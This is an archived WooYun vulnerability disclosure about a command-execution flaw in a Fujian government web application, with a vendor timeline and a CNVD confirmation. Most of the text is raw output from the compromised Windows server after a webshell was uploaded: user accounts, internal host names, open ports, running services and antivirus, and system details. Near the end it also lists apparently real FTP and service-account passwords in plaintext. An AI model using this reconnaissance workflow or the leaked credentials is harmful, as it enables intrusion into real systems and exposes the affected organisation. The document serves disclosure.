乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
系统地址**.**.**.**:8080/fvis/
链接地址**.**.**.**:8080/fvis/modules/test-results-public!toFindByPage.action存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ A:C:D:E:F: ]E:\apache-tomcat-6.0.30_Chuanbo\webapps\fvis\fvis\> net user\\PTHYZFZD-153 的用户帐户-------------------------------------------------------------------------------ASPNET Guest IUSER_FLV IUSR_COPY-40G IWAM_COPY-40G IWAM_FLV ptnmc SUPPORT_388945a0 命令成功完成。系统找不到指定的路径。E:\apache-tomcat-6.0.30_Chuanbo\bin\> net share服务名无效。请键入 NET HELPMSG 2185 以获得更多的帮助。E:\apache-tomcat-6.0.30_Chuanbo\bin\> net view服务器名称 注释-------------------------------------------------------------------------------\\3G0594NEW \\COPY-120G PTDX-AQYPTDXWEB \\CPZX44 \\CPZXDSFDB \\CXQJYJ-01 \\JSJXXY \\JSJXXY172 \\JW-LC-1 \\MZDBA liup32 \\MZWBAJYJ \\PIC-845D7259091 \\PTCPZXLM \\PTCZ \\PTDX-704EFFCBCD \\PTDX-947470F60D \\PTDX-AQYPTQYWEB PTDX-AQYPTQYWEB \\PTDX-CPZX-45 \\PTDX-DF6A9F2678 \\PTDX-XUNI11 \\PTDX-XYW \\PTDXQYXXHB \\PTKHFWBWMJK68 \\PTLDJ \\PTWBDB \\PTXYJW \\SHUILIJU-8C7E67 \\XYQJYJ \\YQJK28 命令成功完成。E:\apache-tomcat-6.0.30_Chuanbo\bin\> netstat -anoActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:21 **.**.**.**:0 LISTENING 1144 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 784 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:801 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 504 TCP **.**.**.**:1521 **.**.**.**:0 LISTENING 1464 TCP **.**.**.**:5560 **.**.**.**:0 LISTENING 1484 TCP **.**.**.**:5580 **.**.**.**:0 LISTENING 1484 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 3960 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 3960 TCP **.**.**.**:13250 **.**.**.**:0 LISTENING 1560 TCP **.**.**.**:1028 **.**.**.**:0 LISTENING 1464 TCP **.**.**.**:1033 **.**.**.**:0 LISTENING 2284 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 3960 TCP **.**.**.**:9089 **.**.**.**:0 LISTENING 1644 TCP **.**.**.**:14147 **.**.**.**:0 LISTENING 1144 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1505 **.**.**.**:1521 ESTABLISHED 1000 TCP **.**.**.**:1526 **.**.**.**:1521 ESTABLISHED 1000 TCP **.**.**.**:4929 **.**.**.**:1521 ESTABLISHED 3960 TCP **.**.**.**:4930 **.**.**.**:1521 ESTABLISHED 3960 TCP **.**.**.**:4931 **.**.**.**:1521 ESTABLISHED 3960 TCP **.**.**.**:4932 **.**.**.**:1521 ESTABLISHED 3960 TCP **.**.**.**:4939 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:41515 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:41566 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:41582 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:41590 ESTABLISHED 3960 UDP **.**.**.**:161 *:* 1544 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:2426 *:* 33564 UDP **.**.**.**:2428 *:* 33564 UDP **.**.**.**:2572 *:* 33564 UDP **.**.**.**:4116 *:* 33564 UDP **.**.**.**:123 *:* 1988 UDP **.**.**.**:1515 *:* 1000 UDP **.**.**.**:123 *:* 1988 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4E:\apache-tomcat-6.0.30_Chuanbo\bin\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 372 暂缺 csrss.exe 420 暂缺 winlogon.exe 444 暂缺 services.exe 492 Eventlog, PlugPlay lsass.exe 504 HTTPFilter, ProtectedStorage, SamSs vmacthlp.exe 684 VMware Physical Disk Helper Service svchost.exe 716 DcomLaunch svchost.exe 784 RpcSs 360rps.exe 840 360rp svchost.exe 900 Dnscache ZhuDongFangYu.exe 912 ZhuDongFangYu svchost.exe 980 AeLookupSvc, AudioSrv, CryptSvc, dmserver, EventSystem, lanmanworkstation, Netman, Nla, SENS, SharedAccess, winmgmt FileZilla Server.exe 1144 FileZilla Server GuardService.exe 1168 GuardForClient inetinfo.exe 1260 IISADMIN iptablex.exe 1296 IptabLex Services isqlplussvc.exe 1368 OracleOraDb10g_home1iSQL*Plus TNSLSNR.EXE 1464 OracleOraDb10g_home1TNSListener java.exe 1484 暂缺 oracle.exe 1496 OracleServiceORCL snmp.exe 1544 SNMP svchost.exe 1560 TermService VMwareService.exe 1588 VMTools vmware-converter-a.exe 1644 vmware-converter-agent vmware-converter.exe 1964 vmware-converter-server svchost.exe 1988 W32Time searchindexer.exe 208 WSearch svchost.exe 412 W3SVC dllhost.exe 2096 COMSysApp msdtc.exe 2208 MSDTC alg.exe 2284 ALG csrss.exe 2412 暂缺 winlogon.exe 2440 暂缺 rdpclip.exe 2748 暂缺 ctfmon.exe 2844 暂缺 explorer.exe 2852 暂缺 wmiprvse.exe 2932 暂缺 VMwareTray.exe 3076 暂缺 VMwareUser.exe 3088 暂缺 SecCopy.exe 3128 暂缺 360sd.exe 3136 暂缺 soffice.exe 3240 暂缺 soffice.bin 3256 暂缺 mmc.exe 3380 暂缺 logon.scr 1428 暂缺 conime.exe 2992 暂缺 java.exe 3960 暂缺 plsqldev.exe 1000 暂缺 notepad.exe 1272 暂缺 360leakfixer.exe 1364 暂缺 360rp.exe 33564 暂缺 iptablex.exe 46868 暂缺 CWebManagerCli.exe 47236 ClientForWebManager CInfoservice.exe 44336 WebInfoServriceCli cmd.exe 48960 暂缺 tasklist.exe 47668 暂缺 wmiprvse.exe 41548 暂缺 E:\apache-tomcat-6.0.30_Chuanbo\bin\> net start已经启动以下 Windows 服务: 360 杀毒实时防护加载服务 Application Experience Lookup Service Application Layer Gateway Service COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Distributed Transaction Coordinator DNS Client Event Log FileZilla Server FTP server GuardServrice HTTP SSL IIS Admin Service IptabLex Services Logical Disk Manager Network Connections Network Location Awareness (NLA) OracleOraDb10g_home1iSQL*Plus OracleOraDb10g_home1TNSListener OracleServiceORCL Plug and Play Protected Storage Remote Procedure Call (RPC) Security Accounts Manager Site Manager Client Servrice SNMP Service System Event Notification Terminal Services VMware Physical Disk Helper Service VMware Tools Service VMware vCenter Converter Agent VMware vCenter Converter Server WebServer Infomation Service Client Windows Audio Windows Firewall/Internet Connection Sharing (ICS) Windows Management Instrumentation Windows Search Windows Time Workstation World Wide Web Publishing Service 主动防御命令成功完成。E:\apache-tomcat-6.0.30_Chuanbo\bin\> ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : pthyzfzd-153 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-50-56-9E-6F-B0 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.** DNS Servers . . . . . . . . . . . : **.**.**.** **.**.**.**E:\apache-tomcat-6.0.30_Chuanbo\bin\> systeminfo主机名: PTHYZFZD-153OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise EditionOS 版本: 5.2.3790 Service Pack 2 Build 3790OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: ptidc注册的组织: ptgov产品 ID: 69813-640-8769354-45542初始安装日期: 2011-3-18, 15:02:50系统启动时间: 145 天 0 小时 29 分 10 秒系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: X86-based PC处理器: 安装了 1 个处理器。 [01]: x86 Family 6 Model 46 Stepping 8 GenuineIntel ~1863 MhzBIOS 版本: PTLTD - 6040000Windows 目录: C:\WINDOWS系统目录: C:\WINDOWS\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 1,023 MB可用的物理内存: 258 MB页面文件: 最大值: 2,287 MB页面文件: 可用: 427 MB页面文件: 使用中: 1,860 MB页面文件位置: c:\pagefile.sys域: WORKGROUP登录服务器: \\PTHYZFZD-153修补程序: 安装了 610 个修补程序。 [01]: File 1 [02]: File 1 [03]: File 1 [04]: File 1 [05]: File 1 [06]: File 1 [07]: File 1 [08]: File 1 [09]: File 1 [10]: File 1 [11]: File 1 [12]: File 1 [13]: File 1 [14]: File 1 [15]: File 1 [16]: File 1 [17]: File 1 [18]: File 1 [19]: File 1 [20]: File 1 [21]: File 1 [22]: File 1 [23]: File 1 [24]: File 1 [25]: File 1 [26]: File 1 [27]: File 1 [28]: File 1 [29]: File 1 [30]: File 1 [31]: File 1 [32]: File 1 [33]: File 1 [34]: File 1 [35]: File 1 [36]: File 1 [37]: File 1 [38]: File 1 [39]: File 1 [40]: File 1 [41]: File 1 [42]: File 1 [43]: File 1 [44]: File 1 [45]: File 1 [46]: File 1 [47]: File 1 [48]: File 1 [49]: File 1 [50]: File 1 [51]: File 1 [52]: File 1 [53]: File 1 [54]: File 1 [55]: File 1 [56]: File 1 [57]: File 1 [58]: File 1 [59]: File 1 [60]: File 1 [61]: File 1 [62]: File 1 [63]: File 1 [64]: File 1 [65]: File 1 [66]: File 1 [67]: File 1 [68]: File 1 [69]: File 1 [70]: File 1 [71]: File 1 [72]: File 1 [73]: File 1 [74]: File 1 [75]: File 1 [76]: File 1 [77]: File 1 [78]: File 1 [79]: File 1 [80]: File 1 [81]: File 1 [82]: File 1 [83]: File 1 [84]: File 1 [85]: File 1 [86]: File 1 [87]: File 1 [88]: File 1 [89]: File 1 [90]: File 1 [91]: File 1 [92]: File 1 [93]: File 1 [94]: File 1 [95]: File 1 [96]: File 1 [97]: File 1 [98]: File 1 [99]: File 1 [100]: File 1 [101]: File 1 [102]: File 1 [103]: File 1 [104]: File 1 [105]: File 1 [106]: File 1 [107]: File 1 [108]: File 1 [109]: File 1 [110]: File 1 [111]: File 1 [112]: File 1 [113]: File 1 [114]: File 1 [115]: File 1 [116]: File 1 [117]: File 1 [118]: File 1 [119]: File 1 [120]: File 1 [121]: File 1 [122]: File 1 [123]: File 1 [124]: File 1 [125]: File 1 [126]: File 1 [127]: File 1 [128]: File 1 [129]: File 1 [130]: File 1 [131]: File 1 [132]: File 1 [133]: File 1 [134]: File 1 [135]: File 1 [136]: File 1 [137]: File 1 [138]: File 1 [139]: File 1 [140]: File 1 [141]: File 1 [142]: File 1 [143]: File 1 [144]: File 1 [145]: File 1 [146]: File 1 [147]: File 1 [148]: File 1 [149]: File 1 [150]: File 1 [151]: File 1 [152]: File 1 [153]: File 1 [154]: File 1 [155]: File 1 [156]: File 1 [157]: File 1 [158]: File 1 [159]: File 1 [160]: File 1 [161]: File 1 [162]: File 1 [163]: File 1 [164]: File 1 [165]: File 1 [166]: File 1 [167]: File 1 [168]: File 1 [169]: File 1 [170]: File 1 [171]: File 1 [172]: File 1 [173]: File 1 [174]: File 1 [175]: File 1 [176]: File 1 [177]: File 1 [178]: File 1 [179]: File 1 [180]: File 1 [181]: File 1 [182]: File 1 [183]: File 1 [184]: File 1 [185]: File 1 [186]: File 1 [187]: File 1 [188]: File 1 [189]: File 1 [190]: File 1 [191]: File 1 [192]: File 1 [193]: File 1 [194]: File 1 [195]: File 1 [196]: File 1 [197]: File 1 [198]: File 1 [199]: File 1 [200]: File 1 [201]: File 1 [202]: File 1 [203]: File 1 [204]: File 1 [205]: File 1 [206]: File 1 [207]: File 1 [208]: File 1 [209]: File 1 [210]: File 1 [211]: File 1 [212]: File 1 [213]: File 1 [214]: File 1 [215]: File 1 [216]: File 1 [217]: File 1 [218]: File 1 [219]: File 1 [220]: File 1 [221]: File 1 [222]: File 1 [223]: File 1 [224]: File 1 [225]: File 1 [226]: File 1 [227]: File 1 [228]: File 1 [229]: File 1 [230]: File 1 [231]: File 1 [232]: File 1 [233]: File 1 [234]: File 1 [235]: File 1 [236]: File 1 [237]: File 1 [238]: File 1 [239]: File 1 [240]: File 1 [241]: File 1 [242]: File 1 [243]: File 1 [244]: File 1 [245]: File 1 [246]: File 1 [247]: File 1 [248]: File 1 [249]: File 1 [250]: File 1 [251]: File 1 [252]: File 1 [253]: File 1 [254]: File 1 [255]: File 1 [256]: File 1 [257]: File 1 [258]: File 1 [259]: File 1 [260]: File 1 [261]: File 1 [262]: File 1 [263]: File 1 [264]: File 1 [265]: File 1 [266]: File 1 [267]: File 1 [268]: File 1 [269]: File 1 [270]: File 1 [271]: File 1 [272]: File 1 [273]: File 1 [274]: File 1 [275]: File 1 [276]: File 1 [277]: File 1 [278]: File 1 [279]: File 1 [280]: File 1 [281]: File 1 [282]: File 1 [283]: File 1 [284]: File 1 [285]: File 1 [286]: File 1 [287]: File 1 [288]: File 1 [289]: File 1 [290]: File 1 [291]: File 1 [292]: File 1 [293]: File 1 [294]: File 1 [295]: File 1 [296]: File 1 [297]: Q147222 [298]: KB2416451 - Q网卡: 安装了 1 个 NIC。 [01]: VMware Accelerated AMD PCNet Adapter 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.**E:\apache-tomcat-6.0.30_Chuanbo\bin\>
ftpyonghuftp!103pt登陆软件密码 :系统密码**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**,**.**.**.**/**.**.**.**IUSER_FLVcai!TC528$bin520!26ASDFIWAM_FLV cai!TC528$bin520!62ZXCVpt351100!
危害等级:高
漏洞Rank:13
确认时间:2015-11-20 15:36
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。
暂无
